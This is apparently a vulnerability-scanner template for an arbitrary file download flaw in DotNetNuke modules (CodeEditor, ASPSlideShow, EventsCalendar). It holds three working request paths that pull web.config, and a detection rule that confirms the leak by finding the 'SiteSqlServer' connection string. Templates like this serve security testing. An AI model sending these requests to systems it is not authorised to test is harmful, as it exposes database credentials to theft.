id: dotnetnuke-codeeditor-lfi
info:
  name: DotNetNuke CodeEditor Arbitrary File Download
  risk: Potential

params:
  - root: "{{.BaseURL}}"

# replicate:
#   prefixes: 'REPORTSERVER, ReportServer'

variables:
  - exp: |
      DesktopModules/ASPSlideShow/ASPSlideShowDownload.aspx?ID=~/web.config
      DesktopModules/DNNCodeEditor/DNNCodeEditorDownload.aspx?ID=/web.config
      desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

requests:
  - method: GET
    url: >-
      {{.root}}/{{.exp}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "<configuration>") && StringSearch("body", "SiteSqlServer")

references:
  - links:
      - https://packetstormsecurity.com/files/126996/DotNetNuke-CodeEditor-Arbitrary-File-Download.html